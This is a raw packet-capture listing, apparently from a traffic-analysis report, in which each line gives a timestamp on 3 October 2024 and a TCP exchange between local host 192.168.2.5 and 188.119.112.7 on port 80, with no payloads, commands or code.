                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.246985912 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247005939 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247642040 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247658014 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247673035 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247688055 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247703075 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247703075 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247720003 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247735023 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247750044 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247750998 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247767925 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247776031 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247785091 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247796059 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247800112 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247816086 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247831106 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247845888 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247849941 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247874022 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.247889996 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248507023 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248523951 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248538017 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248553991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248567104 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248583078 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248598099 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248614073 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248629093 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.248821974 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249027967 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249044895 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249059916 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249074936 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249090910 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249093056 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249106884 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249121904 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249138117 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249141932 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249154091 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249167919 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249182940 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249190092 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249197960 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249209881 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249214888 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249232054 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249243975 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249248028 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249263048 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249293089 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.249310017 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250158072 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250173092 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250189066 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250204086 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250217915 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250222921 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250233889 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250246048 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250248909 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250266075 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250281096 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250284910 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250296116 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250312090 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250327110 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250329018 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250341892 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250349998 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250358105 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250366926 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250406027 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.250999928 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251015902 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251029968 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251046896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251063108 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251064062 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251087904 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251107931 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251111984 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251127958 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251137018 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251162052 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251188040 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251213074 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.251230001 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.257987022 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.262861967 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.262917995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.262953043 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263031006 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263098001 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263132095 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263155937 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263165951 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263200045 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263257980 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263339043 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263370991 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263406038 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263422966 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263457060 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263474941 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263736010 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263784885 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263792992 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263818026 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263850927 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263885975 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263901949 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263919115 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263931036 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263953924 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.263987064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264019012 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264023066 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264051914 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264062881 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264086008 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264117956 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264162064 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264539003 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264571905 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264605999 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264610052 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264638901 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264648914 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264672995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264705896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264724970 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264740944 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264772892 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264786005 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264805079 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264837027 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264872074 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264883995 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264904022 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264915943 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264936924 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.264970064 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265018940 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265352011 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265415907 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265461922 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265497923 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265531063 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265546083 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265566111 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265598059 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265609026 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265634060 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265667915 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.265682936 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282690048 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282736063 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282773018 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282814026 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282851934 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282866001 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282866001 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282897949 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.282922983 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283010960 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283045053 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283065081 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283077955 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283111095 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283144951 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283169031 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283176899 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283199072 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283210039 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283247948 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283293962 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283412933 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283447981 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283466101 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283479929 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283513069 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283546925 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283565998 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283580065 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283596039 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283612967 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283646107 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283667088 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283680916 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283926964 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283958912 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283977985 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.283991098 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284003973 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284024000 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284056902 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284085989 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284105062 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284135103 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284274101 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284306049 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284339905 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284372091 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284385920 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284405947 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284419060 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284439087 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284745932 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284796953 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284799099 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284833908 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284842968 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284868002 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284900904 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284931898 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284946918 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284965038 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284976006 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.284998894 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285031080 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285080910 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285098076 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285115957 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285128117 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285149097 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285182953 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285207987 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285581112 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285614014 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285646915 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285646915 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285726070 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285758972 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285774946 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285793066 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285804987 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285826921 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285859108 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285892010 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285904884 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285923004 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285937071 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285955906 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.285988092 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286021948 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286034107 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286053896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286066055 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286087990 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286650896 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286684990 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286712885 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286717892 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286726952 CEST4970480192.168.2.5188.119.112.7
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286768913 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286798000 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286828995 CEST8049704188.119.112.7192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:02.286843061 CEST4970480192.168.2.5188.119.112.7
